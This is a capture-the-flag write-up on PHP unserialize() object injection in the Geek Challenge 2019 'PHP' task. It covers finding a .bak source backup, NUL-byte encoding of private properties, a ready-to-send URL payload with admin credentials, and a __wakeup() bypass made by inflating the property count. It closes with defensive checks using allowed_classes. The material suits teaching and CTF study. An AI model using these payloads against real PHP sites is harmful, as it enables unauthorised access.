web: [Geek Challenge 2019] PHP

Challenge

Opening the challenge page shows a hint.

According to that hint, the site has a backup file. Backup files usually carry the .bak extension and can be found by scanning with dirsearch.

Visiting the discovered path downloads a file.

It contains some source code.

index.php includes a class file, reads a GET parameter, and passes its value straight to unserialize().

In class.php, if username === "admin" and password equals 100, the flag is returned.

Construct the serialized object:

<?php

// Same class name and private properties as in class.php,
// with the values the flag check expects.
class Name{
    private $username = "admin";
    private $password = 100;
}
$a = new Name();
$str = serialize($a);   // produces the O:4:"Name":2:{...} string
echo $str;
?>

The output contains invisible characters before and after "Name". Fields declared private are only visible inside the declaring class; they are not visible in subclasses or through object instances. For that reason, when a private field name is serialized, both the class name and the field name are preceded by an ASCII 0 (NUL) character, which does not show up when the string is printed. This is why the length prefix reads s:14 for an eight-character name such as username.
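To make those NUL bytes visible and to show why the string has to be URL-encoded before it is sent, here is an added example (it is not code from the original write-up; the Name class is a stand-in for the one in class.php, whose full body is not reproduced):

```php
<?php
// Added example: shows the NUL bytes that PHP inserts into the serialized
// names of private properties, and how to carry them safely in a URL.
class Name {
    private $username = "admin";
    private $password = 100;
}

$str = serialize(new Name());

// Raw output: the NUL bytes are invisible in a terminal.
echo $str, "\n";

// A hex dump makes them visible. Each private property name is serialized as
// "\0" . ClassName . "\0" . property, so "username" occupies
// 1 + 4 + 1 + 8 = 14 bytes, matching the s:14 prefix.
echo bin2hex($str), "\n";

// One pair of NUL bytes per private property.
echo substr_count($str, "\0"), " NUL bytes\n";   // 4

// urlencode() turns every NUL into %00 (and percent-encodes quotes, braces
// and separators too), giving a string that survives a GET parameter.
// Copy-pasting the raw output would drop the NULs and the length prefixes
// would no longer match the data.
echo urlencode($str), "\n";

// Round trip: the encoded string still decodes to a Name object.
$copy = unserialize(urldecode(urlencode($str)));
var_dump($copy instanceof Name);   // bool(true)
```

Running this with the PHP CLI prints the raw string, its hex form, the NUL count and the percent-encoded form; the hex form is the quickest way to confirm that a payload you have copied still contains the NUL bytes.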

With the NUL bytes written as %00, the string becomes:

O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

The __wakeup() function also has to be bypassed here.

Final payload:

?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}

Summary

1. The presence of magic methods such as __destruct, __construct and __wakeup is a sign that deserialization is involved and may be exploitable.

2. PHP serialization and deserialization
Serialization: serialize() converts a complex data type (array, string, object, etc.) into a string.
Deserialization: unserialize() converts such a string back into a variable or object.
Commonly used magic methods:
__construct(): called when an object is created (initialisation).
__wakeup(): triggered when unserialize() is used.
__sleep(): triggered when serialize() is used.
__destruct(): called when an object is destroyed.

3. Fields declared private are only visible inside the declaring class, not in subclasses or through object instances. Therefore, when a private field name is serialized, both the class name and the field name are preceded by an ASCII 0 (NUL) character, which is invisible when printed.

4. __wakeup() bypass

When deserializing a string, if the declared number of properties is greater than the actual number of properties, the __wakeup() function is skipped. This behaviour was fixed in PHP 5.6.25 and 7.0.10 (patched versions make unserialize() fail instead), so the bypass only works on older interpreters.
Original: O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
Bypass: O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
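To see the property-count behaviour on your own interpreter, and the checks a defender should add around unserialize(), here is an added example (not code from the original write-up; the Name class and its __wakeup() are stand-ins for class.php, whose real body is not reproduced):

```php
<?php
// Added example: observes whether __wakeup() runs when the declared property
// count exceeds the real one, and shows two defensive checks.
class Name {
    private $username = "admin";
    private $password = 100;
    public static $wakeupCalls = 0;   // counter, not serialized (static)

    public function __wakeup() {
        self::$wakeupCalls++;
    }
}

// Deserialize one payload and report what came back and whether __wakeup ran.
function tryUnserialize(string $label, string $payload) {
    Name::$wakeupCalls = 0;
    $obj = @unserialize($payload);   // silence the notice on malformed input
    printf("%-15s result=%s wakeup=%d\n",
        $label,
        $obj === false ? 'false' : get_class($obj),
        Name::$wakeupCalls);
    return $obj;
}

$good = serialize(new Name());                        // O:4:"Name":2:{...}
$bad  = str_replace('"Name":2:', '"Name":3:', $good); // declared 3, real 2

tryUnserialize('correct', $good);        // result=Name wakeup=1
tryUnserialize('count mismatch', $bad);
// Before PHP 5.6.25 / 7.0.10: result=Name wakeup=0, the object is built but
// __wakeup() is skipped. On patched PHP: result=false wakeup=0, so code that
// never checks for a false return value still silently accepts the failure.

// Defensive check 1: always test the return value of unserialize().
if (tryUnserialize('checked', $bad) === false) {
    echo "rejected malformed input\n";
}

// Defensive check 2 (PHP 7+): refuse to instantiate any class from untrusted
// input. The data still parses, but no __wakeup() of any class can fire.
$safe = unserialize($good, ['allowed_classes' => false]);
echo get_class($safe), "\n";   // __PHP_Incomplete_Class
```

The second check is the one that actually removes the risk: with allowed_classes set to false (or to an explicit whitelist), a string naming Name, or any other class, can no longer reach that class's magic methods, regardless of which PHP version is running.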


Origin blog.csdn.net/gsumall04/article/details/133443450